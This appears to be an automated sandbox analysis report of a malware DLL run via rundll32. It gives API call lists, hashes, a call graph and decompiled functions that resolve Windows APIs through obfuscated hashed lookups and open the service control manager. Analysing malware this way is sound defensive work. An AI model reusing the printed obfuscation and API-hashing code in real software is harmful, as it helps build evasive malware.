                                                                                                                      • Instruction ID: b8177a2bef97c6db83ac0ed626da55a545c9139c8ac7342270f03f66935dd0b6
                                                                                                                      • Opcode Fuzzy Hash: eb27006848965884004c9991400e475c3ac81a8aa5cc97471f58b07f94fae74b
                                                                                                                      • Instruction Fuzzy Hash: C5F03C34900A15CFDF12EB64CD8559DBBF2FF88702B100115E446BA161DB72AD80CE16
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetTickCount.KERNEL32 ref: 1002E228
                                                                                                                      • GetTickCount.KERNEL32 ref: 1002E235
                                                                                                                      • CoFreeUnusedLibraries.OLE32 ref: 1002E244
                                                                                                                      • GetTickCount.KERNEL32 ref: 1002E24A
                                                                                                                        • Part of subcall function 1002E1AF: CoFreeUnusedLibraries.OLE32 ref: 1002E1F3
                                                                                                                        • Part of subcall function 1002E1AF: OleUninitialize.OLE32 ref: 1002E1F9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 685759847-0
                                                                                                                      • Opcode ID: d44be934c2ef75bd78d99a79b72ea99719dbba6c3db094d6346c85c7022cb1da
                                                                                                                      • Instruction ID: 8d1cfe8ad11ec7d0de67206570733d2bfe4fd9a2d1bcb630a2e9799106cb1609
                                                                                                                      • Opcode Fuzzy Hash: d44be934c2ef75bd78d99a79b72ea99719dbba6c3db094d6346c85c7022cb1da
                                                                                                                      • Instruction Fuzzy Hash: F0E0ED318942B4CBEB04EB20EDC83993BE8FB46305F524526D04693165DF346C99DE62
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID: (
                                                                                                                      • API String ID: 1473721057-3887548279
                                                                                                                      • Opcode ID: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
                                                                                                                      • Instruction ID: 55505e3d54abccaab23e3fb35bc0536c28338c561f08ce7921e5662988eb51c3
                                                                                                                      • Opcode Fuzzy Hash: 008ec943e52341c0dca71a05145884f93f6144af570bd047c2597266c283ece8
                                                                                                                      • Instruction Fuzzy Hash: 52517A75600B11DFCB64CF68D9C2A2AB7F5FF48314B904A6DE5868BA52C770F981CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: H_prolog3
                                                                                                                      • String ID: @
                                                                                                                      • API String ID: 431132790-2766056989
                                                                                                                      • Opcode ID: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
                                                                                                                      • Instruction ID: 3c539a28780873688809e1a5131d88fd7e7c20f84f620333ebd6e4501b894ad0
                                                                                                                      • Opcode Fuzzy Hash: 154d677d06bdea17fd7c180cae35ab477e1537548e58b8b808fb5212b96a33b2
                                                                                                                      • Instruction Fuzzy Hash: 2951D5B0A0020A9FDB04CFA8C8D8AEEB7F9FF48305F50456AE516EB251E775A945CF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 100150B5
                                                                                                                      • PathFindExtensionA.SHLWAPI(?), ref: 100150CB
                                                                                                                        • Part of subcall function 10014B27: _strcpy_s.LIBCMT ref: 10014B33
                                                                                                                        • Part of subcall function 10014DA8: __EH_prolog3.LIBCMT ref: 10014DC7
                                                                                                                        • Part of subcall function 10014DA8: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10014DE8
                                                                                                                        • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10014DF9
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E2F
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E37
                                                                                                                        • Part of subcall function 10014DA8: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10014E4B
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(?), ref: 10014E6F
                                                                                                                        • Part of subcall function 10014DA8: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10014E75
                                                                                                                        • Part of subcall function 10014DA8: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10014EAE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                                      • String ID: %s.dll
                                                                                                                      • API String ID: 3444012488-3668843792
                                                                                                                      • Opcode ID: 329f67baf803e57e750ff7b4698f50556b81caf0c39a54e087e53f6ada59587b
                                                                                                                      • Instruction ID: 642a70e52bf11b7de8cb7bbdb6da5a8b8236a488639b363106a5e3ee5626d218
                                                                                                                      • Opcode Fuzzy Hash: 329f67baf803e57e750ff7b4698f50556b81caf0c39a54e087e53f6ada59587b
                                                                                                                      • Instruction Fuzzy Hash: B701B971A10118BFDF09DB74DD86AEE73B8DF04B01F0105E9EA02DB140EEB1EB448661
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,100025CE,00000000,00000000), ref: 10002045
                                                                                                                      • SetLastError.KERNEL32(0000007E), ref: 10002087
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLastRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4100373531-0
                                                                                                                      • Opcode ID: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                      • Instruction ID: bdea880ba7c0c5bd5d2dbe714977ff7d927dc75702b615567210b407e242d671
                                                                                                                      • Opcode Fuzzy Hash: b6f425d35b460735779e1ed3fb281948f59bf2ef0f2add24d18ae520f481b1e4
                                                                                                                      • Instruction Fuzzy Hash: B181A8B4A00209EFDB04CF94C980AAEB7B1FF48354F248159E919AB355D735EE82CF94
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 10020B95
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?), ref: 10020BA5
                                                                                                                      • LocalFree.KERNEL32(?), ref: 10020BAE
                                                                                                                      • TlsSetValue.KERNEL32(?,00000000), ref: 10020BC0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$EnterFreeLeaveLocalValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2949335588-0
                                                                                                                      • Opcode ID: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                      • Instruction ID: af4df8c6ab00e3b134578f48d56f113cbd39bdf93991f651abc1e22c3acb8acd
                                                                                                                      • Opcode Fuzzy Hash: 6676c0264c2eb297a537204f12f4d5c162c59b7e83937d8b07f604b269a52a54
                                                                                                                      • Instruction Fuzzy Hash: 70113435600305EFE721CF54D9C4B9AB7AAFF0A35AF508429F5528B5A2DB71F980CB50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                      • InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                      • LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                        • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3253506028-0
                                                                                                                      • Opcode ID: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                      • Instruction ID: 3404b174272e1aedd22e2de365cf3e448d28d784c73140ac4aa41e98356ae93e
                                                                                                                      • Opcode Fuzzy Hash: cf9bd6703211ded15ebc294ea5b4eaffa7e14a09b8c66129e44fb6711d6d5733
                                                                                                                      • Instruction Fuzzy Hash: 5AF0907350031A9BDB10DB58FC88B1AB6AAFB96355F870816F64582123EB3264C48A61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • EnterCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206D1
                                                                                                                      • TlsGetValue.KERNEL32 ref: 100206E6
                                                                                                                      • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 100206FC
                                                                                                                      • LeaveCriticalSection.KERNEL32(100575E0,?,?,?,10020C8D,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020707
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450650351.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450655689.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalSection$Leave$EnterValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3969253408-0
                                                                                                                      • Opcode ID: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                      • Instruction ID: 186a6cd651b3b82d4df79f5272d157dd9dcdda25cd8a7682fbe975f35e4e1d68
                                                                                                                      • Opcode Fuzzy Hash: 384891d58c6dafcceaf36b456d2d2389f12afbb41143d91066085e81aa889ef7
                                                                                                                      • Instruction Fuzzy Hash: 51F0FE76604720DFD320CF64DD8880B73ABEB8925135A9555F842D3123E630F8058F61
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:16.2%
                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:1078
                                                                                                                      Total number of Limit Nodes:11
GetPEB 4955->4956 4957 427b76 4956->4957 4957->4201 4969 421973 4958->4969 4959 423bf8 GetPEB 4959->4969 4961 421f7e 4978 438c35 4961->4978 4962 42ae03 GetPEB 4962->4969 4965 42ab66 RtlAllocateHeap GetPEB 4965->4969 4966 421f7c 4966->4212 4967 42e7ce GetPEB 4967->4969 4968 421950 2 API calls 4968->4969 4969->4959 4969->4961 4969->4962 4969->4965 4969->4966 4969->4967 4969->4968 4970 43f7fc 4969->4970 4974 43baea 4969->4974 4971 43f812 4970->4971 4972 422d9f GetPEB 4971->4972 4973 43f881 4972->4973 4973->4969 4975 43bb04 4974->4975 4976 422d9f GetPEB 4975->4976 4977 43bba3 4976->4977 4977->4969 4979 438c4e 4978->4979 4980 422d9f GetPEB 4979->4980 4981 438ccb 4980->4981 4981->4966 4983 423da3 4982->4983 4984 422d9f GetPEB 4983->4984 4985 423e1f 4984->4985 4985->4228 4987 435a75 4986->4987 4988 422d9f GetPEB 4987->4988 4989 435b03 4988->4989 4989->4228 4991 43a17e 4990->4991 4992 43a3cc 4991->4992 4995 43a3ca 4991->4995 5002 433f73 4991->5002 4993 42bb4b 2 API calls 4992->4993 4994 43a3e2 4993->4994 5006 42f154 4994->5006 4995->4232 5001 42ae03 GetPEB 5001->4995 5003 433f89 5002->5003 5004 422d9f GetPEB 5003->5004 5005 434007 5004->5005 5005->4991 5015 425c03 5006->5015 5010 42f2b6 5011 43d1c1 5010->5011 5012 43d1e5 5011->5012 5013 42c1dc GetPEB 5012->5013 5014 43a409 5013->5014 5014->5001 5016 425c1d 5015->5016 5017 422d9f GetPEB 5016->5017 5018 425c8b 5017->5018 5018->5010 5019 42884a 5018->5019 5020 428877 5019->5020 5021 422d9f GetPEB 5020->5021 5022 4288de 5021->5022 5022->5010 5032 4410a9 5023->5032 5024 42ab66 2 API calls 5024->5032 5025 433512 2 API calls 5025->5032 5026 43bdb5 GetPEB 5026->5032 5027 441287 5027->4244 5028 44126e 5031 4268de GetPEB 5028->5031 5030 42ae03 GetPEB 5030->5032 5031->5027 5032->5024 5032->5025 5032->5026 5032->5027 5032->5028 5032->5030 5041 43eae6 5032->5041 5034 43ee25 5033->5034 5045 430d33 5034->5045 5038 426e11 5037->5038 5039 426e2f 5037->5039 5038->5039 5040 4268de GetPEB 5038->5040 5039->4244 5040->5038 5042 43eb05 
5041->5042 5043 433512 2 API calls 5042->5043 5044 43ebb1 5043->5044 5044->5032 5044->5044 5046 430d4d 5045->5046 5049 430ead 5046->5049 5052 430eab 5046->5052 5053 433512 2 API calls 5046->5053 5054 43acd3 5046->5054 5064 443672 5046->5064 5069 429a7d 5046->5069 5051 4268de GetPEB 5049->5051 5051->5052 5052->4244 5053->5046 5057 43b1d7 5054->5057 5056 43b1ff 5059 427027 GetPEB 5056->5059 5057->5056 5058 43b38c 5057->5058 5061 42ab66 RtlAllocateHeap GetPEB 5057->5061 5062 430eda GetPEB 5057->5062 5063 42ae03 GetPEB 5057->5063 5086 43f9e2 5057->5086 5058->5058 5060 43b220 5059->5060 5060->5046 5061->5057 5062->5057 5063->5057 5090 43e884 5064->5090 5067 4268de GetPEB 5068 443775 5067->5068 5068->5046 5080 42a69f 5069->5080 5071 42ab36 5074 427027 GetPEB 5071->5074 5073 434e64 GetPEB 5073->5080 5077 42ab34 5074->5077 5077->5046 5078 42ab66 RtlAllocateHeap GetPEB 5078->5080 5079 430eda GetPEB 5079->5080 5080->5071 5080->5073 5080->5077 5080->5078 5080->5079 5081 43e884 GetPEB 5080->5081 5083 43fd29 GetPEB 5080->5083 5084 43f9e2 GetPEB 5080->5084 5085 42ae03 GetPEB 5080->5085 5094 43d76f 5080->5094 5098 425fe2 5080->5098 5102 423e2a 5080->5102 5106 42cfce 5080->5106 5121 42f0a0 5080->5121 5081->5080 5083->5080 5084->5080 5085->5080 5087 43fa0f 5086->5087 5088 422d9f GetPEB 5087->5088 5089 43fa7d 5088->5089 5089->5057 5091 43e897 5090->5091 5092 422d9f GetPEB 5091->5092 5093 43e92c 5092->5093 5093->5067 5095 43d785 5094->5095 5096 422d9f GetPEB 5095->5096 5097 43d7fe 5096->5097 5097->5080 5099 426004 5098->5099 5100 422d9f GetPEB 5099->5100 5101 426070 5100->5101 5101->5080 5103 423e5a 5102->5103 5104 422d9f GetPEB 5103->5104 5105 423ee1 5104->5105 5105->5080 5118 42dd8e 5106->5118 5107 42ab66 RtlAllocateHeap GetPEB 5107->5118 5108 42e107 5110 427027 GetPEB 5108->5110 5109 42e23e 5109->5109 5114 42e125 5110->5114 5112 4268de GetPEB 5112->5118 5113 43fbcf GetPEB 5113->5118 5114->5080 5115 433512 2 API calls 5115->5118 5116 430eda GetPEB 5116->5118 5117 43ba68 GetPEB 
5117->5118 5118->5107 5118->5108 5118->5109 5118->5112 5118->5113 5118->5115 5118->5116 5118->5117 5120 42ae03 GetPEB 5118->5120 5125 425c98 5118->5125 5129 434016 5118->5129 5120->5118 5122 42f0bc 5121->5122 5123 422d9f GetPEB 5122->5123 5124 42f13f 5123->5124 5124->5080 5126 425cc3 5125->5126 5127 422d9f GetPEB 5126->5127 5128 425d47 5127->5128 5128->5118 5130 43404d 5129->5130 5131 422d9f GetPEB 5130->5131 5132 4340d3 5131->5132 5132->5118 5134 42c693 5133->5134 5135 422d9f GetPEB 5134->5135 5136 42c6fb 5135->5136 5136->4247 5138 431215 5137->5138 5139 422d9f GetPEB 5138->5139 5140 43128e 5139->5140 5140->4275 5142 425b7e 5141->5142 5143 422d9f GetPEB 5142->5143 5144 4243d9 5143->5144 5144->4055 5148 424522 5145->5148 5147 424704 5165 439045 5147->5165 5148->5147 5150 441310 GetPEB 5148->5150 5151 424702 5148->5151 5161 42ac8c 5148->5161 5150->5148 5151->4286 5153 43448f 5152->5153 5155 4345a5 5153->5155 5157 42ab66 2 API calls 5153->5157 5158 4345a3 5153->5158 5159 428786 GetPEB 5153->5159 5160 42ae03 GetPEB 5153->5160 5169 42efa6 5153->5169 5156 427af8 GetPEB 5155->5156 5156->5158 5157->5153 5158->4286 5159->5153 5160->5153 5162 42aca9 5161->5162 5163 422d9f GetPEB 5162->5163 5164 42ad23 5163->5164 5164->5148 5166 439062 5165->5166 5167 422d9f GetPEB 5166->5167 5168 4390c7 5167->5168 5168->5151 5170 42efbf 5169->5170 5171 422d9f GetPEB 5170->5171 5172 42f051 5171->5172 5172->5153

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 462 42ea7b-42eb35 call 42cf25 call 422d9f SHGetFolderPathW
                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E0042EA7B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _t41;
                                                                                                                      				intOrPtr* _t50;
                                                                                                                      				void* _t51;
                                                                                                                      				signed int _t52;
                                                                                                                      				signed int _t53;
                                                                                                                      				void* _t60;
                                                                                                                      
                                                                                                                      				_t60 = __edx;
                                                                                                                      				E0042CF25(_t41);
                                                                                                                      				_v16 = 0xd33285;
                                                                                                                      				_v16 = _v16 + 0xd9cb;
                                                                                                                      				_v16 = _v16 | 0xd94823ae;
                                                                                                                      				_v16 = _v16 ^ 0xd9d95ea2;
                                                                                                                      				_v8 = 0xf9f040;
                                                                                                                      				_v8 = _v8 ^ 0x026675a4;
                                                                                                                      				_t52 = 0x46;
                                                                                                                      				_v8 = _v8 / _t52;
                                                                                                                      				_t53 = 0x2b;
                                                                                                                      				_v8 = _v8 / _t53;
                                                                                                                      				_v8 = _v8 ^ 0x000f054e;
                                                                                                                      				_v12 = 0x255c2b;
                                                                                                                      				_v12 = _v12 ^ 0x0b9b7933;
                                                                                                                      				_v12 = _v12 + 0xffff1ebc;
                                                                                                                      				_v12 = _v12 ^ 0x0bb758ac;
                                                                                                                      				_t50 = E00422D9F(0x111af765, 0x1c, _t53, 0xe4d0349b);
                                                                                                                      				_t51 =  *_t50(0, _a8, 0, 0, _t60, 0, __edx, _a4, _a8, 0, _a16, _a20, _a24, 0); // executed
                                                                                                                      				return _t51;
                                                                                                                      			}













                                                                                                                      APIs
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,D9D95EA2,00000000,00000000,?), ref: 0042EB2E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.509808773.0000000000420000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.509873240.0000000000445000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_420000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID: +\%
                                                                                                                      • API String ID: 1514166925-2522068492
                                                                                                                      • Opcode ID: 330e92cc225222d78e9e6c648ddc1dce5f76f2eb2b005bdd55b658b133651eb5
                                                                                                                      • Instruction ID: fbbe7d7127f79ed6c7a0e0ff77926a1c5375bf139932a654a85d58304ae35bef
                                                                                                                      • Opcode Fuzzy Hash: 330e92cc225222d78e9e6c648ddc1dce5f76f2eb2b005bdd55b658b133651eb5
                                                                                                                      • Instruction Fuzzy Hash: 6B119732E00208BBDB14DEE6DA4A8DFBFB5EB85314F108099F504A6250E7754B60AF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 467 42eb36-42ebf1 call 42cf25 call 422d9f OpenSCManagerW
                                                                                                                      C-Code - Quality: 68%
                                                                                                                      			E0042EB36(void* __ecx, intOrPtr _a4, int _a12) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _v28;
                                                                                                                      				intOrPtr _v32;
                                                                                                                      				void* _t40;
                                                                                                                      				void* _t52;
                                                                                                                      				signed int _t54;
                                                                                                                      				signed int _t55;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(0);
                                                                                                                      				E0042CF25(_t40);
                                                                                                                      				_v32 = 0xf43dc;
                                                                                                                      				asm("stosd");
                                                                                                                      				asm("stosd");
                                                                                                                      				_t54 = 0x7c;
                                                                                                                      				asm("stosd");
                                                                                                                      				_v12 = 0x784be4;
                                                                                                                      				_t6 =  &_v12; // 0x784be4
                                                                                                                      				_t55 = 0x36;
                                                                                                                      				_v12 =  *_t6 / _t54;
                                                                                                                      				_v12 = _v12 + 0x9f6a;
                                                                                                                      				_v12 = _v12 * 0x31;
                                                                                                                      				_v12 = _v12 ^ 0x004694cb;
                                                                                                                      				_v8 = 0x884396;
                                                                                                                      				_v8 = _v8 << 2;
                                                                                                                      				_v8 = _v8 ^ 0x1535ea2d;
                                                                                                                      				_v8 = _v8 | 0xb4c8309a;
                                                                                                                      				_v8 = _v8 ^ 0xb7dc5be9;
                                                                                                                      				_v16 = 0x9578bf;
                                                                                                                      				_v16 = _v16 / _t55;
                                                                                                                      				_v16 = _v16 ^ 0x000e2a9d;
                                                                                                                      				E00422D9F(0xcb6a962, 0x1f4, _t55, 0x1b74c9e2);
                                                                                                                      				_t52 = OpenSCManagerW(0, 0, _a12); // executed
                                                                                                                      				return _t52;
                                                                                                                      			}













                                                                                                                      APIs
                                                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 0042EBEA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.509808773.0000000000420000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.509873240.0000000000445000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_10_2_420000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ManagerOpen
                                                                                                                      • String ID: Kx
                                                                                                                      • API String ID: 1889721586-2841836380
                                                                                                                      • Opcode ID: 41dff3092bc1f63532a7cccec9612a866476fb4b2cab239042f705f6c49823a2
                                                                                                                      • Instruction ID: ff4abcf4425d56fdbd9c949639d4090d151f0d36fa2e26d1b82aedb37fe75a33
                                                                                                                      • Opcode Fuzzy Hash: 41dff3092bc1f63532a7cccec9612a866476fb4b2cab239042f705f6c49823a2
                                                                                                                      • Instruction Fuzzy Hash: A3115671E05208FBDB04EFA6D84A9DEBFB5EF44314F108099E504A6250D7B95B14CB91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E00425D65(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _t31;
                                                                                                                      				intOrPtr* _t38;
                                                                                                                      				void* _t39;
                                                                                                                      				void* _t42;
                                                                                                                      
                                                                                                                      				_t42 = __edx;
                                                                                                                      				E0042CF25(_t31);
                                                                                                                      				_v12 = 0x1c122d;
                                                                                                                      				_v12 = _v12 * 0x6a;
                                                                                                                      				_v12 = _v12 ^ 0xecdd50d1;
                                                                                                                      				_v12 = _v12 ^ 0xe74257e3;
                                                                                                                      				_v16 = 0xd55139;
                                                                                                                      				_v16 = _v16 + 0xd07c;
                                                                                                                      				_v16 = _v16 ^ 0x00d6881e;
                                                                                                                      				_v8 = 0x156dc9;
                                                                                                                      				_v8 = _v8 * 0x43;
                                                                                                                      				_v8 = _v8 ^ 0x03beef10;
                                                                                                                      				_v8 = _v8 + 0xffffe13f;
                                                                                                                      				_v8 = _v8 ^ 0x06271f08;
                                                                                                                      				_t38 = E00422D9F(0x4ef88dcb, 0x31, __ecx, 0xa62ab78c);
                                                                                                                      				_t39 =  *_t38(_t42, 0, _a12, 0x28, 0x28, __edx, _a4, 0, _a12, _a16, _a20, _a24); // executed
                                                                                                                      				return _t39;
                                                                                                                      			}










                                                                                                                      APIs
                                                                                                                      • SetFileInformationByHandle.KERNEL32(?,00000000,?,00000028), ref: 00425E04
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, Offset: 00420000, based on PE: true
                                                                                                                      • Associated: 0000000A.00000002.509808773.0000000000420000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000A.00000002.509873240.0000000000445000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
